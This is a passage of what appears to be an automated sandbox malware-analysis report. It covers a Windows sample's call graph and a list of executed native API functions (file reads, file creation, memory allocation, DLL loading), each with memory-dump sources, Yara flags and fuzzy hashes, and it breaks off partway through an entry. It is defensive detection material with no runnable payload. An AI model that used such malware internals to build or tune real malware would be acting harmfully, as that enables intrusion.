97299->97320 97303 40cf4c 97302->97303 97304 41a1e0 LdrLoadDll 97303->97304 97305 40cf65 97304->97305 97306 40cf6c 97305->97306 97313 41a220 97305->97313 97306->97298 97310 40cfa7 97311 41a490 2 API calls 97310->97311 97312 40cfca 97311->97312 97312->97298 97314 41a23c 97313->97314 97315 41af60 LdrLoadDll 97313->97315 97319 1a32ca0 LdrInitializeThunk 97314->97319 97315->97314 97316 40cf8f 97316->97306 97318 41a810 LdrLoadDll 97316->97318 97318->97310 97319->97316 97321 41af60 LdrLoadDll 97320->97321 97322 41a59c 97321->97322 97325 1a32f90 LdrInitializeThunk 97322->97325 97323 419bc9 97323->97280 97323->97281 97325->97323 97327 40831e 97326->97327 97328 40acf0 LdrLoadDll 97327->97328 97329 408343 97328->97329 97330 414e50 LdrLoadDll 97329->97330 97331 408353 97330->97331 97332 40835c PostThreadMessageW 97331->97332 97333 408370 97331->97333 97332->97333 97333->97253 97335 40f683 97334->97335 97341 419e90 97335->97341 97339 41af60 LdrLoadDll 97338->97339 97340 419d6c 97339->97340 97340->97261 97342 419eac 97341->97342 97343 41af60 LdrLoadDll 97341->97343 97346 1a32dd0 LdrInitializeThunk 97342->97346 97343->97342 97344 40f6ae 97344->97253 97346->97344 97347->97184 97349 41af60 LdrLoadDll 97348->97349 97350 419fdc 97349->97350 97353 1a32f30 LdrInitializeThunk 97350->97353 97351 40f4fe 97351->97190 97351->97191 97353->97351 97354->97196 97355->97201 97356->97206 97359 1a32ad0 LdrInitializeThunk

                                                                                                                    Executed Functions

                                                                                                                    Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: 1JA$rMA$rMA
                                                                                                                    • API String ID: 2738559852-782607585
                                                                                                                    • Opcode ID: cfd044915a8c4d8626de4c58d3b1f637a2856d2db2924349a6fa37f39c05cbfa
                                                                                                                    • Instruction ID: 3b13b53766a8699ad8374ac4195570079fd8d58ed1159c955b22eae96201029b
                                                                                                                    • Opcode Fuzzy Hash: cfd044915a8c4d8626de4c58d3b1f637a2856d2db2924349a6fa37f39c05cbfa
                                                                                                                    • Instruction Fuzzy Hash: B2F0F4B2200108AFCB18CF89DC80EEB77A9FF8C354F158259BA1DD7240D630E851CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                                                                                    APIs
                                                                                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID: 1JA$rMA$rMA
                                                                                                                    • API String ID: 2738559852-782607585
                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A31D Relevance: 1.6, APIs: 1, Instructions: 59filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 264 41a31d-41a31f 265 41a321-41a359 call 41af60 264->265 266 41a376-41a3b1 call 41af60 NtCreateFile 264->266 265->266
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 11dc355c5cb9a2af9d7509fcccf455afcbe189f1a6ce482156f8d8b0dfc07fb4
                                                                                                                    • Instruction ID: 2973cbcf7785785568ad3b10b83d17c2657cf96aa729a31f32274c086419095a
                                                                                                                    • Opcode Fuzzy Hash: 11dc355c5cb9a2af9d7509fcccf455afcbe189f1a6ce482156f8d8b0dfc07fb4
                                                                                                                    • Instruction Fuzzy Hash: 7111A2B2204208AFCB08DF98DC85DEB73ADEF8C754F158649FA1D97241D634E861CBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 306 40acf0-40ad0c 307 40ad14-40ad19 306->307 308 40ad0f call 41cc50 306->308 309 40ad1b-40ad1e 307->309 310 40ad1f-40ad2d call 41d070 307->310 308->307 313 40ad3d-40ad4e call 41b4a0 310->313 314 40ad2f-40ad3a call 41d2f0 310->314 319 40ad50-40ad64 LdrLoadDll 313->319 320 40ad67-40ad6a 313->320 314->313 319->320
                                                                                                                    APIs
                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2234796835-0
                                                                                                                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                                                                                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 329 41a360-41a3b1 call 41af60 NtCreateFile
                                                                                                                    APIs
                                                                                                                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 333 41a53a-41a556 334 41a55c-41a57d NtAllocateVirtualMemory 333->334 335 41a557 call 41af60 333->335 335->334
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: cbe4be1059a3d2229a6b536ee7ef4b0040425a7573317a7d3156e6b079f8bedf
                                                                                                                    • Instruction ID: e22161ca23b5782e5b6a534eccc4163cf194bb6cfc05d52a75a5fc13772094ec
                                                                                                                    • Opcode Fuzzy Hash: cbe4be1059a3d2229a6b536ee7ef4b0040425a7573317a7d3156e6b079f8bedf
                                                                                                                    • Instruction Fuzzy Hash: 92F0F2B6200208ABCB14DF89DC81EEB77A9EF88654F158249FA199B341C634E911CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 336 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2167126740-0
                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Close
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3535843008-0
                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
                                                                                                                    • Instruction ID: ccd15f4f5e9f367ae23b7a53e0396d940bb10495947966266a329f4f0d32237d
                                                                                                                    • Opcode Fuzzy Hash: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
                                                                                                                    • Instruction Fuzzy Hash: 1690023120140843D1807198540464A000597D1301F96C025A0025654DCA598B5977A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: af5ed90a375e63938bdc3c77ad9d0e53d001ad60ede4f4cb220ca5f7a6aac483
                                                                                                                    • Instruction ID: 75c1df5b5abdca4485f0631c04eb7711ed9af18fd46fc954e6693becebcd4ac6
                                                                                                                    • Opcode Fuzzy Hash: af5ed90a375e63938bdc3c77ad9d0e53d001ad60ede4f4cb220ca5f7a6aac483
                                                                                                                    • Instruction Fuzzy Hash: 3B90026120240043410571985414616400A97E0201F56C031E1014590DC56989916225
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8a9d58fbd72db647be3416a7762907abf00408f7bc87dea68702cdba580f47bc
                                                                                                                    • Instruction ID: 2de7eabae1fedfa1b36449df57be4ea7615ce7cac15b520e7df093e3a71baa41
                                                                                                                    • Opcode Fuzzy Hash: 8a9d58fbd72db647be3416a7762907abf00408f7bc87dea68702cdba580f47bc
                                                                                                                    • Instruction Fuzzy Hash: F7900435311400430105F5DC17045070047D7D5351757C031F1015550CD775CD715331
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 11b4e3e24ab7b70edd942ab00a7ff32a7f8ff75ee57a0e8a4b74bea57d53b218
                                                                                                                    • Instruction ID: c6ec2017a99274502819de5ec9c181a514f25f2448f35ea4a65a5227e2a3850b
                                                                                                                    • Opcode Fuzzy Hash: 11b4e3e24ab7b70edd942ab00a7ff32a7f8ff75ee57a0e8a4b74bea57d53b218
                                                                                                                    • Instruction Fuzzy Hash: 3090023120140453D11171985504707000997D0241F96C422A0424558DD69A8A52A221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: c36000ec3cf6f387498b8d8525816ec3f6f6d5dc718189454d73869ac99ee9ab
                                                                                                                    • Instruction ID: f66c126153728eef18544a1c08c8206f8d9173b2e4b7386b62071b41aec2ff8c
                                                                                                                    • Opcode Fuzzy Hash: c36000ec3cf6f387498b8d8525816ec3f6f6d5dc718189454d73869ac99ee9ab
                                                                                                                    • Instruction Fuzzy Hash: E5900221242441935545B19854045074006A7E0241B96C022A1414950CC56A9956D721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 1d604430c9c7a8c9614374f8e0915d4350b693fed0ca89ecdc0342b31b2336f1
                                                                                                                    • Instruction ID: 41c73cdec3e3babe47aa49ec82aa9bf71b3f37020d03eec0aadc3c673ddece9c
                                                                                                                    • Opcode Fuzzy Hash: 1d604430c9c7a8c9614374f8e0915d4350b693fed0ca89ecdc0342b31b2336f1
                                                                                                                    • Instruction Fuzzy Hash: F090022130140043D140719864186064005E7E1301F56D021E0414554CD95989565322
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5c808919cd78e38bbb2ba0b7b3d192fba40f3fcc30b41cfb4d4fe2e52675e7d5
                                                                                                                    • Instruction ID: 3ff5f39755f03757e758b46a475d721da4e8e574897a04e841372911ea118373
                                                                                                                    • Opcode Fuzzy Hash: 5c808919cd78e38bbb2ba0b7b3d192fba40f3fcc30b41cfb4d4fe2e52675e7d5
                                                                                                                    • Instruction Fuzzy Hash: 5490022921340043D1807198640860A000597D1202F96D425A0015558CC95989695321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 3e1fb22ce3bf837ace7d84b6edb42a6b3f655672ce119a626e55685098342982
                                                                                                                    • Instruction ID: 2e2ffb061ebc3569260190c0eddcf86be3c45de41e08c38147f7267be01d8a52
                                                                                                                    • Opcode Fuzzy Hash: 3e1fb22ce3bf837ace7d84b6edb42a6b3f655672ce119a626e55685098342982
                                                                                                                    • Instruction Fuzzy Hash: 8B90023120140443D10075D86408646000597E0301F56D021A5024555EC6A989916231
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f10614da6a77360f453a2c16cb599d41d641fc92cf3bff0c3f9c7beb3a4673a8
                                                                                                                    • Instruction ID: db6fe4a158849f01a669b310e54212009f86782cf2b181703206fe8a399efd83
                                                                                                                    • Opcode Fuzzy Hash: f10614da6a77360f453a2c16cb599d41d641fc92cf3bff0c3f9c7beb3a4673a8
                                                                                                                    • Instruction Fuzzy Hash: 5990023120148843D1107198940474A000597D0301F5AC421A4424658DC6D989917221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 972c86322508cecd3571e076830109896d1f4abc7716ff577761391459d4f38b
                                                                                                                    • Instruction ID: 715ddb131726a26e46d419e89d9501376a5409ef41060e8290340a42f9245adf
                                                                                                                    • Opcode Fuzzy Hash: 972c86322508cecd3571e076830109896d1f4abc7716ff577761391459d4f38b
                                                                                                                    • Instruction Fuzzy Hash: BD90022160140083414071A898449064005BBE1211B56C131A0998550DC59D89655765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: ac88b3a5e281062618ab1f3df100a2c3a494323a542b235783a01ba804c8aed7
                                                                                                                    • Instruction ID: 01bcb8b4b709c47d00abcd9d623c5bb41d4f7b7b9d99e028b213e1636eae9e4a
                                                                                                                    • Opcode Fuzzy Hash: ac88b3a5e281062618ab1f3df100a2c3a494323a542b235783a01ba804c8aed7
                                                                                                                    • Instruction Fuzzy Hash: 3090023120180443D1007198581470B000597D0302F56C021A1164555DC66989516671
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e8e4c21c3df333f381a4c437054091d13262134da4a30acee1f521ab2d65a027
                                                                                                                    • Instruction ID: 4c9d90a757eadffbde33e324ddedc27b5c607ce8da81bafe021f97a4c55c0c21
                                                                                                                    • Opcode Fuzzy Hash: e8e4c21c3df333f381a4c437054091d13262134da4a30acee1f521ab2d65a027
                                                                                                                    • Instruction Fuzzy Hash: 1D900221211C0083D20075A85C14B07000597D0303F56C125A0154554CC95989615621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A32F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 37e74598433bc19dac2249144a5474829b2697c4e56e8bd10754ecfd5cd93b81
                                                                                                                    • Instruction ID: 20c47ee0d70b1c77fd63876bcb2c72a0c82d7a3d32b6e7e2d103711dcc3f81cf
